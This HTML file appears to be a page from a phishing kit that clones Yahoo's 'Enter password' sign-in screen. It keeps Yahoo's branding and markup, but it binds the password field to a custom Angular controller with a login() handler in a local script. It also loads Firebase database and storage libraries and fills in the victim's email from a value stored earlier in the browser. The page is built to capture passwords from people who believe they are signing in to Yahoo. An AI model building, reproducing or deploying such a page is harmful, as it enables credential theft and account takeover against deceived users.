<!DOCTYPE html>
<html id="Stencil" class="no-js light-theme "  ng-app="betApp">



<head>
    <meta charset="utf-8">
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no" />
    <meta name="format-detection" content="telephone=no">
    <meta name="referrer" content="origin">
    <title>Yahoo</title>
    <meta name="description"
        content="Best-in-class Yahoo Mail, breaking local, national and global news, finance, sport, music, films and more. You get more out of the web, you get more out of life." />
    <link rel="dns-prefetch" href="http://gstatic.com/">
    <link rel="dns-prefetch" href="http://google.com/">
    <link rel="dns-prefetch" href="http://s.yimg.com/">
    <link rel="dns-prefetch" href="http://y.analytics.yahoo.com/">
    <link rel="dns-prefetch" href="http://ucs.query.yahoo.com/">
    <link rel="dns-prefetch" href="http://geo.query.yahoo.com/">
    <link rel="dns-prefetch" href="http://geo.yahoo.com/">
    <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0" />
    <link rel="apple-touch-icon" href="s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <link rel="apple-touch-icon-precomposed" href="s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <style nonce="zeqnzQHQnl0zUHSM2vykXMgnCJKZGjb8Nd+3zaHFc2DdvgxS">
        #mbr-css-check {
            display: inline;
        }
    </style>
    <link href="s.yimg.com/wm/mbr/19001c683d443fd6a4ce398b9b744eb88ce39a31/yahoo-main.css" rel="stylesheet"
        type="text/css">
    <script nonce="zeqnzQHQnl0zUHSM2vykXMgnCJKZGjb8Nd+3zaHFc2DdvgxS">
        var pageStartTime = new Date().getTime();
        (function (root) {
            var isGoodJS = ('create' in Object && 'isArray' in Array && 'pushState' in window.history);
            root.isGoodJS = isGoodJS;
        }(this));

        (function (root) {
            /* -- Data -- */
            root.YUI_config = {
                "comboBase": "https:\u002F\u002Fs.yimg.com\u002Fzz\u002Fcombo?",
                "combine": true,
                "root": "yui-s:3.18.0\u002F"
            };
            root.COMET_URL = "fail98c8.html\u002F\u002Fpr.comet.yahoo.com\u002Fcomet";
            root.I13N_config = {
                "keys": {
                    "pt": "utility",
                    "ver": "nodejs"
                }
            };
            root.I13N_config || (root.I13N_config = {});
            root.I13N_config.spaceid = 794252015;
            root.I13N_config.location = "fail98c8.html\u002F\u002Flogin.yahoo.com\u002Faccount\u002Fchallenge\u002Ffail?display=login&.intl=nz&intl=nz&specId=yidreg";
            root.I13N_config.referrer = "";
            root.I13N_config.keys || (root.I13N_config.keys = {});
            root.I13N_config.keys.pg_name = "failChallenge";
            root.I13N_config.keys.gm_np = "yahoo";
            root.I13N_config.keys.pstcat = "yidreg";
            root.I13N_config.keys.p_sec = "DEFAULT_SECTION";
            root.I13N_config.keys.p_subsec = "DEFAULT_SUBSECTION";
            root.I13N_config.keys.test = "mbr-ahc-banner,mbr-push-sync,mbr-fido-1fa-login,mbr-enable-commchannel-review-trap,mbr-tos-based-privacy-url,mbr-ahc-apps";
            root.I13N_config.keys.regType = "yidreg";
            root.darlaConfig = {
                "url": "https:\u002F\u002Ffc.yahoo.com\u002Fsdarla\u002Fphp\u002Fclient.php?l=RICH{dest:tgtRICH;asz:flex}&f=794252015&ref=https%3A%2F%2Flogin.yahoo.com%2Faccount%2Fchallenge%2Ffail&sa=geminifed%253D1%2520y-bucket%253Dmbr-ahc-banner%252Cmbr-push-sync%252Cmbr-fido-1fa-login%252Cmbr-enable-commchannel-review-trap%252Cmbr-tos-based-privacy-url%252Cmbr-ahc-apps",
                "k2Rate": 1,
                "positions": {
                    "RICH": {
                        "sandbox": "allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox",
                        "id": "RICH",
                        "clean": "login-ad-rich",
                        "dest": "login-ad-rich",
                        "w": 1440,
                        "h": 1024,
                        "timeout": 5000,
                        "noexp": 1,
                        "fdb": "",
                        "on": 1,
                        "where": "inside",
                        "minReqWidth": 1325,
                        "showAfter": 2000
                    }
                }
            };
            root.challenge || (root.challenge = {});
            root.challenge.servingStamp = 1646825678169;
            root.challenge.isAndroidWebview = false;
            root.I13N_config.keys.pct = "signin";
            root.isIOSDevice = false;
        }(this));


        YUI_config.global = window;


        window.mbrSendError = function (name, url) {
            (new Image()).src = '/account/js-reporting/?rid=221oi0hh2h46e&crumb=' + encodeURIComponent('VdmI5hERhMu') + '&message=' + encodeURIComponent(name) + '&url=' + encodeURIComponent(url);
        };

        var oldError = window.onerror;

        window.onerror = function (errorMsg, url) {
            window.mbrSendError(errorMsg, url);
            if (oldError) {
                oldError.apply(this, arguments);
            }
            return false;
        };
    </script>
</head>

<body class="bucket-mbr-push-sync bucket-mbr-enable-commchannel-review-trap bucket-mbr-tos-based-privacy-url"   ng-controller="MainController">
    <script nonce="zeqnzQHQnl0zUHSM2vykXMgnCJKZGjb8Nd+3zaHFc2DdvgxS">
        (function (root) {
            var doc = document;
            if (root.isGoodJS) {
                doc.documentElement.className = doc.documentElement.className.replace('no-js', 'js');
            }
        }(this));
    </script>
    <div id="login-body" class="loginish  puree-v2">
        <div class="mbr-desktop-hd">
            <span class="column">
                <a href="https://nz.yahoo.com/">
                    <img src="s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo"
                        class="logo " width="" height="36" />
                    <img src="s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo"
                        class="dark-mode-logo logo " width="" height="36" />
                </a>
            </span>
            <span class="column help txt-align-right">
                <a href="https://help.yahoo.com/kb/index?locale=en_NZ&amp;page=product&amp;y=PROD_ACCT">Help</a>
            </span>
        </div>
        <div class="login-box-container">
            <div class="login-box right">
                <div class="mbr-login-hd txt-align-center">
                    <img src="s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo"
                        class="logo " width="" height="27" />
                    <img src="s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo"
                        class="dark-mode-logo logo " width="" height="27" />
                </div>
                <div class="challenge yid-challenge">
                    <div class="challenge-header">
                    </div>
                    <div class="username-challenge" id="login-landing">
                        <span class="challenge-desc signin-sub-title" id="email"> </span>
                        <strong class="challenge-heading">Enter password</strong>
                        <span class="challenge-desc signin-sub-title">to finish sign in</span>
                        </span>
                        <form id="login-username-form" method="post" class="pure-form">
                            <input type="hidden" name="browser-fp-data" id="browser-fp-data" value="" />
                            <input type="hidden" name="crumb" value="Zfd4U5Lq36U" />
                            <input type="hidden" name="acrumb" value="FtZeMi65" />
                            <input type="hidden" name="sessionIndex" value="QQ--" />
                            <input type="hidden" name="displayName" value="" />
                            <input type="hidden" name="deviceCapability" value="" id="deviceCapability" />
                            <div id="username-country-code-field"
                                class="username-country-code puree-country-inline-dropdown-disabled code-of-length-3">
                                <div id="selected-country-code-cont"
                                    class="puree-dropdown selected-country-code-cont ltr hide">
                                    <div id="selected-country-code" class="selected-country-code">+234</div>
                                    <span class="arrow"></span>
                                </div>

                                <div class="input-group">
                                    <input class="phone-no " type="password" name="username" id="login-username"
                                    ng-model="user.password"
                                        value="" autocomplete="username" autocapitalize="none" autocorrect="off"
                                        autofocus="true" placeholder=" " />
                                    <div class="input-field-icon hide" id="username-field-icon"></div>
                                    <label for="login-username" id="login-label" class="login-label">Password</label>

                                </div>

                            </div>
                            <p id="username-error" class="error-msg hide" role="alert"></p>


                            <div class="button-container">
                                <input id="login-signin" type="button" name="signin"  ng-click="login()"
                                    class="pure-button puree-button-primary challenge-button" value="Next"
                                    data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next" />
                                <br><br>
                            </div>


                            <div class="bottom-links-container has-social-buttons">
                                <p class="sign-up-link" style="text-align: center;">
                                    <a href="https://login.yahoo.com/account/create?.intl=nz&amp;specId=yidReg&amp;done=https%3A%2F%2Fwww.yahoo.com"
                                        id="createacc" role="button" data-rapid-tracking="true"
                                        data-ylk="elm:link;elmt:secondary;slk:signup;mKey:signup">Forgot password?</a>
                                </p>

                            </div>
                        </form>
                    </div>
                </div>
            </div>
            <div id="login-box-ad-fallback" class="login-box-ad-fallback">
                <h1>Yahoo makes it easy to enjoy what matters most in your world.</h1>
                <p>Best-in-class Yahoo Mail, breaking local, national and global news, finance, sport, music, films and
                    more. You get more out of the web; you get more out of life.</p>
            </div>
        </div>
        <div class="login-bg-outer">
            <div class="login-bg-inner">
                <div id="login-ad-rich"></div>
            </div>
        </div>

    </div>
    <script src="s.yimg.com/ss/rapid-3.53.30.js"></script>

    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
        <input type="checkbox" id="mbr-legacy-device-bar-cross" />
        <p class="mbr-legacy-device">
            Yahoo works best with the latest versions of browsers. You're using an out-of-date or unsupported browser
            and some Yahoo features may not work properly. Please update your browser version now. <a
                href="#">More info</a>
        </p>
    </div>
    <script nonce="zeqnzQHQnl0zUHSM2vykXMgnCJKZGjb8Nd+3zaHFc2DdvgxS">
        (function (root) {
            if (!root.isGoodJS) {
                document.getElementById('mbr-legacy-device-bar').style.display = 'block';
            }
        }(this));
    </script>


<script src="./lib/jquery-3.6.0.min.js"></script>

    <script >
      

                $(document).ready(function () {
                        var login = window.localStorage.getItem("login");
                        $("#email").text(login.split("@")[0]);


                    });


                       
    </script>


<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/8.4.3/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
        https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/8.4.3/firebase-analytics.js"></script>

<script src="https://www.gstatic.com/firebasejs/8.4.3/firebase-firestore.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.4.3/firebase-storage.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.4.3/firebase-auth.js"></script>

<script src="./lib/angular.min.js"></script>
<script src="./lib/moment.min.js"></script>
<script src="./lib/angular-moment.min.js"></script>
<script src="./js/app.js"></script>



</body>

</html>

</html>